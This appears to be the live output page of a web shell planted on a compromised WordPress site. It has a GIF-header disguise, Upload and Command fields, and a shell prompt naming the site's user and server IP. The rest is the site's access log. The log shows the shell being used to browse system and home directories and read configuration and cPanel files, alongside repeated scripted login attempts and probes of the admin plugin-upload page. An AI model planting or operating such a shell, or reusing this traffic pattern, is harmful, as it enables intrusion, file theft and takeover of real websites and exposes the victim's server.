GIF87a; 404

MY HEART




Upload:

Command:

diavoloapp@3.145.158.137: ~ $
162.214.117.84 - - [25/Apr/2025:06:05:40 -0600] "POST /wp-cron.php?doing_wp_cron=1745582740.0464520454406738281250 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
107.189.3.177 - - [25/Apr/2025:06:05:38 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:06:09:36 -0600] "POST /wp-cron.php?doing_wp_cron=1745582976.4030559062957763671875 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
107.189.3.177 - - [25/Apr/2025:06:09:35 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
184.72.95.195 - - [25/Apr/2025:06:28:43 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=//etc HTTP/1.1" 200 624500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
54.164.106.236 - - [25/Apr/2025:06:28:55 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html&read=/home/diavoloapp/public_html/wordpress-6.7.1.zip HTTP/1.1" 200 61461 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.89.176.255 - - [25/Apr/2025:06:29:04 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html&read=/home/diavoloapp/public_html/wp-config-sample.php HTTP/1.1" 200 64818 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.44.174.136 - - [25/Apr/2025:06:29:08 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html/wp-content/plugins/tp-portfolio HTTP/1.1" 200 18690 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
184.73.68.20 - - [25/Apr/2025:06:29:13 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/.softaculous HTTP/1.1" 200 12985 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:06:54:25 -0600] "POST /wp-cron.php?doing_wp_cron=1745585665.8295350074768066406250 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
144.76.72.245 - - [25/Apr/2025:06:54:24 -0600] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 404 111603 "-" "python-requests/2.32.3"
162.214.117.84 - - [25/Apr/2025:07:01:00 -0600] "POST /wp-cron.php?doing_wp_cron=1745586060.1049070358276367187500 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.184.136 - - [25/Apr/2025:07:00:59 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0"
198.98.48.90 - - [25/Apr/2025:07:02:32 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:07:03:32 -0600] "POST /wp-cron.php?doing_wp_cron=1745586212.0394289493560791015625 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.184.136 - - [25/Apr/2025:07:03:30 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0"
45.61.188.237 - - [25/Apr/2025:07:03:32 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
198.98.48.90 - - [25/Apr/2025:07:03:39 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36"
45.61.188.237 - - [25/Apr/2025:07:04:04 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
45.61.184.136 - - [25/Apr/2025:07:04:06 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
45.61.188.237 - - [25/Apr/2025:07:04:33 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
198.98.48.90 - - [25/Apr/2025:07:04:51 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
45.61.188.237 - - [25/Apr/2025:07:04:52 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
45.61.184.136 - - [25/Apr/2025:07:05:13 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
198.98.48.90 - - [25/Apr/2025:07:06:07 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
66.249.65.66 - - [25/Apr/2025:07:09:55 -0600] "GET /robots.txt HTTP/1.1" 200 75 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.67 - - [25/Apr/2025:07:10:32 -0600] "GET / HTTP/1.1" 200 471762 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.95 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
3.223.181.32 - - [25/Apr/2025:07:12:44 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html/wp-content/plugins/all-in-one-wp-migration-file-extension HTTP/1.1" 200 18875 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.204.150.196 - - [25/Apr/2025:07:12:47 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html/wp-includes HTTP/1.1" 200 568024 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:07:12:51 -0600] "POST /wp-cron.php?doing_wp_cron=1745586771.2324259281158447265625 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
198.98.54.73 - - [25/Apr/2025:07:12:49 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
198.98.54.73 - - [25/Apr/2025:07:12:52 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
198.98.54.73 - - [25/Apr/2025:07:12:55 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
184.73.47.24 - - [25/Apr/2025:07:12:57 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html/wp-content/plugins/eduma-demo-data HTTP/1.1" 200 10975 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
198.98.54.73 - - [25/Apr/2025:07:12:59 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:07:19:39 -0600] "POST /wp-cron.php?doing_wp_cron=1745587179.4687960147857666015625 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
43.135.145.73 - - [25/Apr/2025:07:19:32 -0600] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
103.11.103.186 - - [25/Apr/2025:07:19:45 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "GRequests/0.10"
103.11.103.186 - - [25/Apr/2025:07:19:48 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "GRequests/0.10"
103.11.103.186 - - [25/Apr/2025:07:19:52 -0600] "GET /wp-admin/ HTTP/1.1" 302 - "-" "GRequests/0.10"
44.210.204.255 - - [25/Apr/2025:07:27:31 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html/wp-content/plugins&read=/home/diavoloapp/public_html/wp-content/plugins/20250313115355.php HTTP/1.1" 200 82132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:07:28:37 -0600] "POST /wp-cron.php?doing_wp_cron=1745587717.3109629154205322265625 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
103.11.103.186 - - [25/Apr/2025:07:28:36 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "GRequests/0.10"
103.11.103.186 - - [25/Apr/2025:07:28:39 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "GRequests/0.10"
103.11.103.186 - - [25/Apr/2025:07:28:42 -0600] "GET /wp-admin/ HTTP/1.1" 302 - "-" "GRequests/0.10"
20.15.133.164 - - [25/Apr/2025:07:30:25 -0600] "GET /robots.txt HTTP/1.1" 200 75 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
20.15.133.175 - - [25/Apr/2025:07:34:32 -0600] "GET /js-support-ticket-controlpanel/?d=di-262-982907-combinaison-de-sudation-amazon HTTP/1.1" 200 470923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:07:38:04 -0600] "POST /wp-cron.php?doing_wp_cron=1745588284.6243469715118408203125 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
198.98.61.49 - - [25/Apr/2025:07:38:00 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0"
198.98.61.49 - - [25/Apr/2025:07:38:51 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0"
198.98.61.49 - - [25/Apr/2025:07:39:51 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
198.98.61.49 - - [25/Apr/2025:07:40:45 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:07:47:27 -0600] "POST /wp-cron.php?doing_wp_cron=1745588847.0604650974273681640625 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
198.98.54.73 - - [25/Apr/2025:07:47:25 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"
162.214.117.84 - - [25/Apr/2025:07:49:45 -0600] "POST /wp-cron.php?doing_wp_cron=1745588985.8404409885406494140625 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
198.98.54.73 - - [25/Apr/2025:07:49:35 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0"
198.98.54.73 - - [25/Apr/2025:07:50:59 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
198.98.54.73 - - [25/Apr/2025:07:52:09 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
23.22.105.143 - - [25/Apr/2025:07:52:35 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=//home HTTP/1.1" 200 3724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:07:53:59 -0600] "POST /wp-cron.php?doing_wp_cron=1745589239.0107901096343994140625 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.185.91 - - [25/Apr/2025:07:53:57 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2"
162.214.117.84 - - [25/Apr/2025:07:55:15 -0600] "POST /wp-cron.php?doing_wp_cron=1745589315.7269289493560791015625 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
198.98.52.69 - - [25/Apr/2025:07:55:14 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4"
198.98.52.69 - - [25/Apr/2025:07:56:07 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36"
45.61.185.91 - - [25/Apr/2025:07:57:04 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2"
198.98.52.69 - - [25/Apr/2025:07:58:12 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4"
162.214.117.84 - - [25/Apr/2025:07:59:29 -0600] "POST /wp-cron.php?doing_wp_cron=1745589569.0686500072479248046875 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
198.98.52.69 - - [25/Apr/2025:07:59:27 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
198.98.52.69 - - [25/Apr/2025:07:59:47 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36"
45.61.185.91 - - [25/Apr/2025:07:59:53 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
198.98.52.69 - - [25/Apr/2025:08:00:26 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
198.98.52.69 - - [25/Apr/2025:08:02:07 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:08:02:20 -0600] "POST /wp-cron.php?doing_wp_cron=1745589740.0938820838928222656250 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
43.166.255.122 - - [25/Apr/2025:08:02:18 -0600] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
162.214.117.84 - - [25/Apr/2025:08:04:35 -0600] "POST /wp-cron.php?doing_wp_cron=1745589875.0644719600677490234375 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.185.91 - - [25/Apr/2025:08:04:33 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
198.98.52.69 - - [25/Apr/2025:08:04:38 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
45.61.184.238 - - [25/Apr/2025:08:07:43 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
45.61.184.238 - - [25/Apr/2025:08:08:13 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:08:09:27 -0600] "POST /wp-cron.php?doing_wp_cron=1745590167.0411269664764404296875 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.184.238 - - [25/Apr/2025:08:09:25 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:08:11:28 -0600] "POST /wp-cron.php?doing_wp_cron=1745590288.6921811103820800781250 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.184.238 - - [25/Apr/2025:08:11:27 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
45.61.184.238 - - [25/Apr/2025:08:11:43 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
162.214.117.84 - - [25/Apr/2025:08:15:30 -0600] "POST /wp-cron.php?doing_wp_cron=1745590530.6312639713287353515625 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.184.238 - - [25/Apr/2025:08:15:29 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
20.15.133.174 - - [25/Apr/2025:08:15:42 -0600] "GET /js-support-ticket-controlpanel/?d=di-262-4611934-wicker-gliding-chair HTTP/1.1" 200 470920 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:08:17:07 -0600] "POST /wp-cron.php?doing_wp_cron=1745590627.2360270023345947265625 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.184.238 - - [25/Apr/2025:08:17:05 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:08:18:42 -0600] "POST /wp-cron.php?doing_wp_cron=1745590722.6733319759368896484375 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.184.238 - - [25/Apr/2025:08:18:41 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:08:21:42 -0600] "POST /wp-cron.php?doing_wp_cron=1745590902.1933469772338867187500 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
198.98.61.49 - - [25/Apr/2025:08:21:40 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"
198.98.61.49 - - [25/Apr/2025:08:22:53 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko"
45.61.184.136 - - [25/Apr/2025:08:23:02 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0"
198.98.61.49 - - [25/Apr/2025:08:24:14 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:08:25:30 -0600] "POST /wp-cron.php?doing_wp_cron=1745591130.5620400905609130859375 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
198.98.61.49 - - [25/Apr/2025:08:25:29 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:08:26:59 -0600] "POST /wp-cron.php?doing_wp_cron=1745591219.1881721019744873046875 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
198.98.57.200 - - [25/Apr/2025:08:26:57 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
45.61.184.136 - - [25/Apr/2025:08:26:59 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0"
54.162.139.241 - - [25/Apr/2025:08:27:12 -0600] "GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1" 404 111603 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.98.57.200 - - [25/Apr/2025:08:28:36 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
198.98.57.200 - - [25/Apr/2025:08:29:57 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
45.61.184.136 - - [25/Apr/2025:08:29:58 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:08:31:43 -0600] "POST /wp-cron.php?doing_wp_cron=1745591503.4846351146697998046875 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
198.98.57.200 - - [25/Apr/2025:08:31:42 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:08:32:22 -0600] "POST /wp-cron.php?doing_wp_cron=1745591542.2347309589385986328125 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.184.136 - - [25/Apr/2025:08:32:20 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
44.207.207.36 - - [25/Apr/2025:08:36:07 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=//run HTTP/1.1" 200 167890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.231.45.47 - - [25/Apr/2025:08:36:25 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html/wp-content/plugins/learnpress-collections HTTP/1.1" 200 16914 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:08:37:29 -0600] "POST /wp-cron.php?doing_wp_cron=1745591849.3965959548950195312500 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
222.165.190.229 - - [25/Apr/2025:08:37:28 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "GRequests/0.10"
222.165.190.229 - - [25/Apr/2025:08:37:31 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "GRequests/0.10"
222.165.190.229 - - [25/Apr/2025:08:37:34 -0600] "GET /wp-admin/ HTTP/1.1" 302 - "-" "GRequests/0.10"
45.61.187.191 - - [25/Apr/2025:08:38:00 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
45.61.187.191 - - [25/Apr/2025:08:38:58 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
45.61.187.191 - - [25/Apr/2025:08:39:47 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
162.214.117.84 - - [25/Apr/2025:08:40:39 -0600] "POST /wp-cron.php?doing_wp_cron=1745592039.9124379158020019531250 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
45.61.187.191 - - [25/Apr/2025:08:40:38 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
34.234.197.175 - - [25/Apr/2025:08:54:36 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp&read=/home/diavoloapp/.spamassassinboxenable HTTP/1.1" 200 50580 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
199.195.249.51 - - [25/Apr/2025:09:01:25 -0600] "GET /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:09:03:14 -0600] "POST /wp-cron.php?doing_wp_cron=1745593394.0102100372314453125000 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
199.195.249.51 - - [25/Apr/2025:09:03:12 -0600] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
162.214.117.84 - - [25/Apr/2025:09:04:50 -0600] "POST /wp-cron.php?doing_wp_cron=1745593490.1948380470275878906250 HTTP/1.1" 200 - "-" "WordPress/6.8; https://diavoloapp.com"
199.195.249.51 - - [25/Apr/2025:09:04:48 -0600] "GET /wp-admin/themes.php HTTP/1.1" 302 - "-" "python-requests/2.27.1"
199.195.249.51 - - [25/Apr/2025:09:06:58 -0600] "GET /wp-admin/plugin-install.php?tab=upload HTTP/1.1" 302 - "-" "python-requests/2.27.1"
3.221.222.168 - - [25/Apr/2025:09:28:19 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/.cpanel HTTP/1.1" 200 16627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.210.114.189 - - [25/Apr/2025:09:28:23 -0600] "GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/2025042315010228095582.php?dir=/home/diavoloapp/public_html/wp-content/plugins/woocommerce-paypal-payments HTTP/1.1" 200 29129 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
